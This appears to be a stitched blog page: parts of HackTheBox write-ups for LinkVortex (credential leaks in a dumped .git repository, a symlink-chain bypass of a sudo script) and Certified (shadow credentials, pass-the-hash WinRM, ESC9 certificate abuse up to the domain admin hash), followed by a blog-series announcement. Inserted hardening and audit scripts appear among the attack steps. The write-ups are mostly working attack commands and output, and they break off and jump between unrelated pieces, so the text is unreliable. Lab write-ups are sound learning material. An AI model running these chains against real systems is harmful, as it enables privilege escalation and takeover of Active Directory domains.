nmap finds two open TCP ports, SSH (22) and HTTP (80):
croc@hacker$ rustscan -a 10.10.11.47 --ulimit 5000 -- -A -T5 -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.47:22
Open 10.10.11.47:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -oA Initial -vvv -p 22,80 10.10.11.47

Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received syn-ack (0.25s latency).
Scanned at 2025-01-05 08:59:07 EST for 25s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack Apache httpd
|_http-server-header: Apache
|_http-generator: Ghost 5.58
|_http-title: BitByBit Hardware
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We will be using the git-dumper tool inside a Python virtual environment to dump this .git directory. We use a virtual environment because Python packages on Kali Linux are externally managed by apt, and this leaves the default environment untouched. Use the following commands to set it up:
In order to dump secrets like passwords, API keys, etc. out of this loot directory, we'll be using another tool called gitleaks. You need to have two things to get going:
I have saved both of these into my /opt/gitleaks folder and will be using it from there while pointing to the loot directory.
croc@hacker:/opt/gitleaks$ sudo ./gitleaks -c gitleaks.toml -r findings.json dir /home/croc/HTB/linkvortex/git/my_git/loot

    ○
    │╲
    │ ○
    ○ ░
    ░░gitleaks

10:20AM INF scanned ~31628339 bytes (31.63 MB) in 9.59s
10:20AM WRN leaks found: 67
This password was found inside the /ghost/core/test/regression/api/admin/authentication.test.js file & is most likely the password for the admin account.
Logging into Ghost Admin Dashboard
Let’s try to log in into the Ghost Admin Dashboard with the password found:
And, I got in!! Hohooo!!
Shell as Bob
Recall the exploit we found at the very start that required a pair of credentials to work. Now that we have a pair of valid credentials, let's test it out!
Researching Ghost on Google and with AI, I found that /var/www/ghost/config.production.json is a sensitive configuration file, but unfortunately this file doesn't exist here.
Upon further searching, I found out that when Ghost is installed via Docker, paths may differ based on the container configuration. In such cases, configuration files are often mounted in /var/lib/ghost/ or similar directories. So I tried that out and, guess what, the file exists there and revealed the password for bob@linkvortex.htb.
I gained initial shell access with the above credentials via SSH:
croc@hacker$ ssh bob@10.10.11.47
The authenticity of host '10.10.11.47 (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.47' (ED25519) to the list of known hosts.
bob@10.10.11.47's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Dec  3 11:41:50 2024 from 10.10.14.62
bob@linkvortex:~$
Bob can execute clean_symlink.sh as sudo without a password. The *.png is a shell glob pattern that allows Bob to run the script on any .png file. Additionally, the CHECK_CONTENT environment variable is preserved, meaning its value remains available inside the script even when executed with sudo.
Let’s see what that bash file is doing.
clean_symlink.sh
Note that we do not have write permissions to the file:
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK; then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)'; then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
In a nutshell, the script checks whether the .png path it is given is a symbolic link. If the link target matches etc or root (e.g. /etc or /root), the link gets removed. Otherwise, the link is moved to the quarantine folder /var/quarantined, and the content it points to is displayed if CHECK_CONTENT=true.
Let me give you a practical demonstration of how this is working.
Testing the Functionality
I created a file intro.txt containing my introduction in German (just for fun). Then I created a symbolic link named test.png pointing to intro.txt.
bob@linkvortex:~$ echo "Hallo! Ich bin Haseeb und ich komme aus Pakistan. Ich bin student im universitat" > intro.txt
bob@linkvortex:~$ ln -s /home/bob/intro.txt test.png
bob@linkvortex:~$ ls -la
total 40
drwxr-x--- 5 bob  bob  4096 Feb 23 19:26 .
drwxr-xr-x 3 root root 4096 Nov 30 10:07 ..
lrwxrwxrwx 1 root root    9 Apr  1  2024 .bash_history -> /dev/null
-rw-r--r-- 1 bob  bob   220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 bob  bob  3771 Jan  6  2022 .bashrc
drwx------ 2 bob  bob  4096 Nov  1 08:40 .cache
drwx------ 3 bob  bob  4096 Feb 22 22:39 .gnupg
drwxrwxr-x 3 bob  bob  4096 Feb 22 22:48 .local
-rw-r--r-- 1 bob  bob   807 Jan  6  2022 .profile
-rw-rw-r-- 1 bob  bob    81 Feb 23 19:25 intro.txt
lrwxrwxrwx 1 bob  bob    19 Feb 23 19:26 test.png -> /home/bob/intro.txt
-rw-r----- 1 root bob    33 Feb 22 21:58 user.txt
After that, I fed test.png into the clean_symlink.sh script with CHECK_CONTENT=true. Because the link target is neither under /etc nor /root, the script moved the link to /var/quarantined and printed the contents of the intro.txt file we created above.
💡 Think Box
Now, how can we utilize that to get the root flag?
Our target is /root/root.txt but we can’t directly create a symbolic link to that because the clean_symlink.sh script removes direct symbolic links pointing to sensitive locations (e.g., /root/ or /etc). However, there is a workaround for this.
Workaround
The above script only checks the first level of the symlink: readlink (without -f) returns the immediate target, so the (etc|root) check never sees where a chain of links finally ends up. Instead of directly creating a symlink to /root/root.txt, we can try doing it in two steps.
First, I created a symlink named supportmeonpatreon.txt pointing to /root/root.txt & then I created another symlink named exploit.png pointing to /home/bob/supportmeonpatreon.txt.
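A hardened rewrite of the quarantine logic, added here as an example and not the script from the box: it resolves the whole symlink chain with readlink -m (assumed: GNU coreutils) before applying the /etc and /root check, and quotes every variable, so the two-hop chain described above is caught. The demo functions build their links in a temporary directory and never touch the real /root.

```bash
#!/bin/bash
# Added example (not the /opt/ghost/clean_symlink.sh from the box).
# The original script inspects only the first hop with `readlink`, so
# exploit.png -> hop.txt -> /root/root.txt slips past its (etc|root) grep.
# Resolving the final target closes that gap.

# Returns 0 when the fully resolved target lives under /etc or /root,
# 1 otherwise. Fails closed: an unresolvable link is treated as sensitive.
is_sensitive_target() {
    link="$1"
    # readlink -m follows every hop and canonicalises the result without
    # requiring the final target to exist (dangling links are still judged)
    target=$(readlink -m -- "$link") || {
        echo "! Could not resolve [ $link ], refusing to process !"
        return 0
    }
    case "$target" in
        /etc|/etc/*|/root|/root/*) return 0 ;;
        *) return 1 ;;
    esac
}

# $1: path to check (must end in .png), $2: quarantine directory
# Return codes: 0 handled/nothing to do, 2 bad argument, 3 link removed
clean_symlink() {
    link="$1"
    quar_dir="${2:-/var/quarantined}"
    case "$link" in
        *.png) ;;
        *) echo "! First argument must be a png file !"; return 2 ;;
    esac
    [ -L "$link" ] || return 0   # regular files are left alone
    if is_sensitive_target "$link"; then
        echo "! Trying to read critical files, removing link [ $link ] !"
        rm -f -- "$link"
        return 3
    fi
    echo "Link found [ $link ] , moving it to quarantine"
    mv -- "$link" "$quar_dir/"
    return 0
}

# Constructed demo: the two-hop chain from the write-up, built under /tmp.
# Returns clean_symlink's code (3 = the chain was detected and removed).
demo_two_hop() {
    tmp=$(mktemp -d /tmp/cleansym.XXXXXX)
    mkdir -p "$tmp/quarantine"
    ln -s /root/root.txt "$tmp/hop.txt"          # hop 1 -> sensitive target
    ln -s "$tmp/hop.txt" "$tmp/exploit.png"      # hop 2 -> hop 1
    clean_symlink "$tmp/exploit.png" "$tmp/quarantine"; rc=$?
    rm -rf "$tmp"
    return "$rc"
}

# Constructed demo: a harmless link (like test.png -> intro.txt) is still
# quarantined as before. Returns 0 if the link ended up in quarantine.
demo_benign() {
    tmp=$(mktemp -d /tmp/cleansym.XXXXXX)
    mkdir -p "$tmp/quarantine"
    echo "Hallo!" > "$tmp/intro.txt"
    ln -s "$tmp/intro.txt" "$tmp/test.png"
    clean_symlink "$tmp/test.png" "$tmp/quarantine"
    [ -L "$tmp/quarantine/test.png" ]; rc=$?
    rm -rf "$tmp"
    return "$rc"
}
```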
I started by looking at our environment and evaluating the attack surface:
croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.41 -u 'CERTIFIED\judith.mader' -p 'judith09'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json  domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html
croc@hacker$ firefox domain_users_by_group.html
This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file, which comes in very handy afterwards when password spraying.
The ca_operator account presents some possibility of AD CS exploitation due to the clue in its name. Furthermore, I see that the management_svc account has WinRM access.
SMB – 139/445
I enumerated the available shares but none of them looked interesting to me. So, this is not the way to go for sure!
I collected the .json data files using the Python BloodHound ingestor and uploaded them into BloodHound.
croc@hacker$ python3 -m bloodhound -d certified.htb -u 'judith.mader' -p 'judith09' -ns 10.10.11.41 -c all
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.certified.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 47S
croc@hacker$ ls
20250122051720_computers.json   20250122051720_groups.json  20250122051720_containers.json  20250122051720_ous.json
20250122051720_domains.json     20250122051720_users.json   20250122051720_gpos.json
Under first degree object control, I found that judith.mader has WriteOwner permissions over the management@certified.htb group. This means that we can make ourselves the owner of this group & move forward from there.
Shell as Management_svc
Take Ownership
I made judith.mader the owner of the management@certified.htb group. Furthermore, I also gave judith.mader full control over the group.
croc@hacker$ sudo impacket-owneredit -action write -new-owner 'judith.mader' -target 'management' -dc-ip 10.10.11.41 'certified.htb/judith.mader:judith09' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
croc@hacker$ impacket-dacledit -action write -rights 'FullControl' -principal 'judith.mader' -target 'management' -dc-ip 10.10.11.41 'certified.htb/judith.mader:judith09' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250122-084900.bak
[*] DACL modified successfully!
BloodHound
As we have full control over the management@certified.htb group, it's worth checking what potential pathways we have in BloodHound. I found that members of this group have GenericWrite privileges over the management_svc user account.
💡 Think Box
This allows us to perform a Shadow Credentials Attack if we’re a member of the management@certified.htb group.
Adding ourselves to the Management Group
I used bloodyAD to add judith.mader into the management group:
croc@hacker$ bloodyAD -u 'judith.mader' -p 'judith09' -d 'certified.htb' --host 10.10.11.41 add groupMember 'Management' 'judith.mader'
[+] judith.mader added to Management
Now we can perform the shadow credentials attack, as we have write privileges over management_svc, which is also a remote management user.
Shadow Credentials Attack
In summary, if a user has GenericWrite over another user object, it can modify that object's msDS-KeyCredentialLink attribute to add its own public key. This is the basis of the Shadow Credentials attack.
Now, as soon as we authenticate using the corresponding private key and certificate via PKINIT, we obtain a TGT as the target user.
After that, we can extract the NT hash using the TGT. Let’s put it all into action!
We will be using pywhisker for creating the shadow credentials along with PKINITtools in order to request the TGT and get the NT hash.
Step #01: Virtual Environment
It’s better to work in a virtual environment so that our main system remains unaffected:
Using pywhisker, I modified the msDS-KeyCredentialLink attribute of management_svc while authenticating as judith.mader:
(shadow)croc@hacker$ python3 pywhisker/pywhisker/pywhisker.py -d 'certified.htb' -u 'judith.mader' -p 'judith09' --target 'management_svc' --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 38127bd6-4f2a-d064-e4e3-e6e4e5b539c9
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: WldHpeku.pfx
[*] Must be used with password: dPy8eLovBBsTA4ucFZFI
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Note that the associated private key and certificate are stored in the WldHpeku.pfx file, which we will use to request a TGT.
Step #03: Request a TGT
Using WldHpeku.pfx file generated above along with its password, I requested a TGT which is saved into the management_svc.ccache file.
I learned to use faketime alongside ntpdate to mitigate the KRB_AP_ERR_SKEW error from 0xCOFFEE. Additionally, it’s important to note the AS-REP encryption key value, as it will be required in the next step.
Step #04: NT Hash
Next, I used getnthash.py against the management_svc.ccache file (the TGT) to request a service ticket for the current user using U2U. The KDC responded with a service ticket that contains the PAC, encrypted with the session key.
As the TGT used to request the service ticket was obtained via PKINIT, the PAC contains the NT hash of the authenticated user. Our goal is to extract that NT Hash!
(shadow)croc@hacker$ export KRB5CCNAME=management_svc.ccache
(shadow)croc@hacker$ faketime "$(ntpdate -q 10.10.11.41 | cut -d ' ' -f 1,2)" python3 PKINITtools/getnthash.py -key a53dfd2e95fa729f54179127e81c09b0c646daf2accde582684e49c8d362b92c certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
We have successfully retrieved the NT hash of management_svc account. Have some dance lol!!!
Alternative – certipy-ad
A much more convenient way to perform the shadow credentials attack is to use certipy-ad:
croc@hacker:~$ faketime "$(ntpdate -q 10.10.11.41 | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username 'judith.mader@certified.htb' -p 'judith09' -account 'management_svc'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9588457c-3627-8282-5932-ded69c8d8065'
[*] Adding Key Credential with device ID '9588457c-3627-8282-5932-ded69c8d8065' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '9588457c-3627-8282-5932-ded69c8d8065' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
WinRM as management_svc
As management_svc is a remote management user, we can gain evil-winrm shell access:
croc@hacker:~$ sudo evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
[sudo] password for croc:

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>
The user management_svc has GenericAll privileges over the user ca_operator.
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
💡 Think Box
We have multiple attack options here. The most straightforward approach is a password reset, but we can also consider targeted Kerberoasting or leveraging shadow credentials. Learn more about the potential attack paths with GenericAll here.
Since we’ve already explored the shadow credentials attack, I attempted targeted Kerberoasting. However, the extracted hash didn’t crack, so this approach wasn’t successful. Given this, resetting the password remains the most viable option.
Force Password Change
I used bloodyAD to change the password for ca_operator account to supportmeonPatreon while authenticating as management_svc:
You can also do that from the WinRM session we already have:
*Evil-WinRM* PS C:\Users\management_svc\Documents> net user 'ca_operator' 'supportmeonPatreon' /domain
The command completed successfully.
💡 Think Box
If I had to guess, the ca_operator user account might lead us to some AD CS exploitation. Let's enumerate that!
AD CS Enumeration
Identify AD CS
I used nxc with the adcs module and, guess what, AD CS is actually in place.
croc@hacker:$ nxc ldap 10.10.11.41 -u 'ca_operator' -p 'supportmeonPatreon' -M adcs
LDAP        10.10.11.41     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP        10.10.11.41     389    DC01             [+] certified.htb\ca_operator:supportmeonPatreon
ADCS        10.10.11.41     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.41     389    DC01             Found PKI Enrollment Server: DC01.certified.htb
ADCS        10.10.11.41     389    DC01             Found CN: certified-DC01-CA
Misconfigured Certificate Templates
I used certipy-ad to find enabled and vulnerable certificate templates:
croc@hacker:$ certipy-ad find -u 'ca_operator' -p 'supportmeonPatreon' -dc-ip 10.10.11.41 -enabled -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250122183515_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250122183515_Certipy.txt'
[*] Saved JSON output to '20250122183515_Certipy.json'
A template named CertifiedAuthentication was found to be vulnerable to ESC9:
To understand ESC9, you need to understand certificate mapping. Note that this is gonna be just a high-level overview of what’s happening under the hood. For detailed understanding, refer to the resources at the end of this post.
Certificate Mapping
Normally, you use a username and a password to authenticate in Active Directory(AD). The DC will look up the AD account with a matching username and verify that the password you provided is correct for this account.
However, when you use a certificate instead of a password for authentication purposes, the DC will perform “Certificate Mapping” to verify that the certificate “maps” to the AD account you specified.
There are two types of certificate mapping: implicit and explicit. We’re only concerned with implicit certificate mapping in this case.
Implicit Certificate Mapping
Assume that a user bob enrolls a certificate from AD CS. The certificate authority (CA) includes his userPrincipalName (UPN) in the otherName field of the issued certificate; otherName is part of the Subject Alternative Name (SAN) extension.
Now, when bob tries to authenticate with his username and the certificate, the DC checks whether the certificate maps to Bob's account by comparing the UPN in the otherName field of the certificate with the UPN attribute stored in Bob's AD account. This particular concept is called UPN Mapping.
Also note that computer accounts do not have a UPN, so in that case DNS Mapping is used, where the dNSHostName attribute is compared instead. This whole process is called Implicit Certificate Mapping.
The Attack
The following is the flow of the attack against weak implicit certificate mapping:
1. Modify the victim’s UPN/DNS attribute to match the target’s UPN/DNS or sAMAccountName.
2. Enroll a certificate as the victim. This causes the target's UPN/DNS to be injected into the certificate. Revert the victim account's UPN value after enrolling the certificate.
3. Use the certificate to authenticate as target account.
Here’s an animation from Jonas Bülow Knudsen to illustrate that:
The Patch
Microsoft introduced the concept of "strong mapping" to address this issue. Enterprise CAs now add a new certificate extension (szOID_NTDS_CA_SECURITY_EXT) containing the enrollee's SID to newly issued certificates. This extension is commonly called the SID or security extension. It enables the DC to verify that the account that enrolled the certificate is also the account the certificate maps to, and otherwise to reject the authentication attempt.
Microsoft also introduced a new certificate template flag called NO_SECURITY_EXTENSION in the msPKI-Enrollment-Flag attribute of certificate templates. If enabled, the enterprise CA does not add the SID extension to certificates issued from that template.
In addition to that, for the purpose of enforcement of strong mapping, Microsoft released two new registry key values, StrongCertificateBindingEnforcement for Kerberos Authentication and CertificateMappingMethods for Schannel Authentication.
Abusing ESC9
Oliver Lyak discovered that the patch didn’t prevent his implicit certificate mapping exploit in its entirety. It was still possible under certain circumstances which he called ESC9 and ESC10.(We’ll only discuss ESC9)
Following are the requirements of ESC9:
Account A has GenericWrite over Account B
Certificate template has the NO_SECURITY_EXTENSION flag enabled
StrongCertificateBindingEnforcement set to 0/1 (Disabled/Compatibility) OR CertificateMappingMethods contains UPN flag
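An added audit helper, not from the original post and not part of Certipy: it takes the three preconditions above as inputs an administrator can read from AD (the template's msPKI-Enrollment-Flag and the control edge reported by BloodHound) and from the DC registry (StrongCertificateBindingEnforcement and CertificateMappingMethods) and reports whether the ESC9 chain is still open. The bit values it relies on, CT_FLAG_NO_SECURITY_EXTENSION = 0x80000 and the UPN mapping bit 0x4, are Microsoft's documented ones; the control-relationship input is a plain yes/no because the script does not query AD itself.

```bash
#!/bin/bash
# Added example: evaluates the ESC9 preconditions from the write-up against
# values pulled out of AD and the DC registry. Nothing here talks to a DC;
# it is a pure decision function you can feed from your own exports.

NO_SECURITY_EXTENSION=$((0x00080000))   # CT_FLAG_NO_SECURITY_EXTENSION (msPKI-Enrollment-Flag)
CMM_UPN=$((0x4))                        # UPN bit of CertificateMappingMethods (Schannel)

# $1: msPKI-Enrollment-Flag of the template (decimal or 0x-prefixed hex)
template_skips_sid_extension() {
    [ $(( $1 & NO_SECURITY_EXTENSION )) -ne 0 ]
}

# $1: StrongCertificateBindingEnforcement (0 disabled, 1 compatibility, 2 full)
kerberos_binding_is_weak() {
    [ "$1" -eq 0 ] || [ "$1" -eq 1 ]
}

# $1: CertificateMappingMethods bitmask (default on a patched DC is 0x18)
schannel_allows_upn_mapping() {
    [ $(( $1 & CMM_UPN )) -ne 0 ]
}

# Usage: esc9_exposed <write_control: yes|no> <enrollment_flag> <sbce> <cmm>
# Returns 0 when every precondition holds (ESC9 path open), 1 otherwise, and
# prints one line per condition so the output doubles as an audit report.
esc9_exposed() {
    write_ctrl="$1"; flag="$2"; sbce="$3"; cmm="$4"
    ok=0
    if [ "$write_ctrl" = yes ]; then
        echo "[+] an attacker-reachable account has write control over the enrollee"
    else
        echo "[-] no write control over the enrollee"; ok=1
    fi
    if template_skips_sid_extension "$flag"; then
        echo "[+] template sets NO_SECURITY_EXTENSION (issued certs carry no SID)"
    else
        echo "[-] template includes the SID security extension"; ok=1
    fi
    if kerberos_binding_is_weak "$sbce" || schannel_allows_upn_mapping "$cmm"; then
        echo "[+] DC still accepts weak mapping (SBCE=$sbce, CMM=$cmm)"
    else
        echo "[-] DC enforces strong mapping (SBCE=$sbce, CMM=$cmm)"; ok=1
    fi
    return "$ok"
}

# Constructed sample run: a template with only the NO_SECURITY_EXTENSION bit
# set on a DC left in compatibility mode. Clearing the flag on the template or
# setting SBCE=2 while dropping 0x4 from CMM makes the same call return 1.
# esc9_exposed yes 0x80000 1 0x18
```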
Privilege Escalation Chain
The privilege escalation chain in this case looks like this:
1. The user management_svc has GenericAll over ca_operator so change the UPN of ca_operator to administrator.
2. Request the certificate as ca_operator using the vulnerable template. This will cause the UPN of administrator be injected on the issued certificate.
3. Revert the UPN of ca_operator back to its original form so that the certificate doesn't map to this account when authenticating.
4. Authenticate as the Domain Administrator.
Step #01: Change the UPN
I changed the UPN of ca_operator to administrator. It couldn’t be administrator@certified.htb because that would conflict with the legitimate account, as UPNs must be unique to single accounts.
croc@hacker$ certipy-ad account update -username 'management_svc@certified.htb' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user 'ca_operator' -upn 'Administrator'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'
Step #02: Request a Certificate using the Vulnerable Template
I requested a certificate using the vulnerable template found above as ca_operator. This causes the UPN of administrator to be injected into the certificate's otherName field.
croc@hacker$ certipy-ad req -u 'ca_operator@certified.htb' -p 'supportmeonPatreon' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 23
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Step #03: Restore the Changes
I reverted the UPN of ca_operator back to its original form so that when we authenticate using the administrator.pfx certificate, it doesn't map to this account.
croc@hacker$ certipy-ad account update -username 'management_svc@certified.htb' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user 'ca_operator' -upn 'ca_operator@certified.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
Step #04: Authenticate as Domain Administrator
Next, I used the certificate to authenticate as domain admin giving out the administrator’s NTLM hash:
croc@hacker$ certipy-ad auth -pfx administrator.pfx -domain 'certified.htb' -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
As we dive into 2025, I’m thrilled to introduce you to the Upcoming Blog Series here at CrocHub. This marks the first “Chronicles” post rather than a technical one, and I’m keeping it casual to give you a sneak peek of what’s in store. My goal? To help you decide if the content I’m planning is worth your time (spoiler: it is 😁).
I’m dedicated to sharing valuable content with a writing style that’s so engaging and relatable that you’ll keep coming back for more. I want to create something you genuinely look forward to reading, and I promise you that it’s mostly going to be really practical hands-on stuff, along with the thought process behind every step, and some bad jokes (you’ve been warned lol).
Without further ado, let’s dive into what’s coming your way!
CrocHub – What to Expect?
Following are the topics on which I will be starting a blog series:
1) Active Directory Hacking
Active Directory (AD) is a hacker’s playground—and for good reason.
Over 90% of the Fortune 1000 companies use AD in their IT infrastructure. That statistic alone highlights its importance when we talk about exploiting and assessing the security posture of an organization.
In this blog series, I will walk you through each and every attack possible in the GOAD(Game of Active Directory) lab. From the lab setup to exploitation and mitigations, I am here at your service!
This series will serve as a cornerstone for this blog & your ultimate war manual for AD battlefield. So, gear up and be excited!
2) Wifi Hacking
Wi-Fi networks are everywhere—and so are their vulnerabilities. From coffee shops to enterprise setups, poorly configured wireless networks can be a hacker's goldmine and a nightmare for the sysadmin.
As part of this series, we’ll set up a home wifi hacking lab and perform all the common wifi-related attacks while also learning the steps to secure and mitigate these vulnerabilities.
3) HTB/THM Writeups
Occasionally, I do plan on doing some detailed writeups of HackTheBox & TryHackme challenges. These will include all the necessary steps from boot to root while my key focus is going to be on the thought process behind every step. I’ll try to add as much context and details as possible which will help you learn how to think like a hacker.(Tho I am also still learning that😉)
I’ll be doing more of AD or Windows based boxes because that’s my strongest side.
4) Cheat Sheets
Cheat sheets are lifesavers, whether you’re on a real-life engagement or tackling a live exam. These can help you stay organized, streamline your workflow and avoid overlooking critical steps. I do plan on creating extensive cheat sheets on stuff like enumeration, privilege escalation, or what I feel like is beneficial.
Before ending up, I would like to share about my journey and my upcoming goals briefly.
From /dev/null to here
Backstory
My journey in cybersecurity began in the most unexpected way—after watching a Bollywood movie. Though the film was based on unrealistic simulations, it ignited a spark in me! It outlined the bad impact those malicious guys can have on our society, and more importantly, it fueled a deep curiosity to learn more about hacking so that I can contribute to making the online world a better place. As a result, I dived right in!
First Steps
It was the start of 2023; I started tinkering around and watching different videos on YouTube about the career pathway and all that kind of stuff. I learned that Linux is essential for an ethical hacker, and this was the first time I was introduced to the term "virtualization". I installed Kali Linux in a VM (Virtual Machine) and started watching tutorials on how to use it.
To strengthen my foundation, I enrolled in courses for Python and Bash scripting. While I managed to complete them, I realized that a lack of consistent practice caused much of the knowledge to fade over time. Recognizing this gap, I plan to revisit and redo these courses to ensure a deeper and more lasting understanding.
